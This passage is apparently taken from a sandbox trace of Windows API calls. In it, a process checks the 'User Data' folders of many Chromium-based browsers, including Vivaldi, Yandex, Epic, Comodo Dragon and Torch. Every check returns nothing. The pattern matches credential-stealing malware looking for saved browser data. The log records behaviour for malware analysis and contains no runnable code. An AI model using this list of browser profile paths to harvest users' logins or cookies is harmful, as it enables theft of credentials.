(dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.879] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.879] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0280.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.880] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0280.880] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0280.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.882] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0280.883] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.884] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.884] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0280.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.885] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0280.885] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.886] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.887] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0280.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.887] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0280.887] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0280.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.890] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0280.890] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.892] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.892] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0280.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.892] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0280.892] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.894] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.894] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0280.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.894] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0280.895] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.896] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.896] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0280.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.897] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0280.897] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.898] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.899] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0280.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.899] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0280.899] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.901] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.901] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0280.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.901] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0280.902] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.903] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.903] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0280.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.904] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0280.904] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.906] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.907] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0280.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.907] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0280.907] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.909] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.909] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0280.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.910] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0280.910] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.911] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.912] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0280.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.912] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0280.912] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.914] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.914] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0280.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.914] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0280.915] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.916] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.916] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0280.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.917] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0280.917] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.918] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.918] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0280.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0280.919] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.921] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.921] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0280.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.922] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0280.922] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.924] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.924] ExpandEnvironmentStringsW (in: 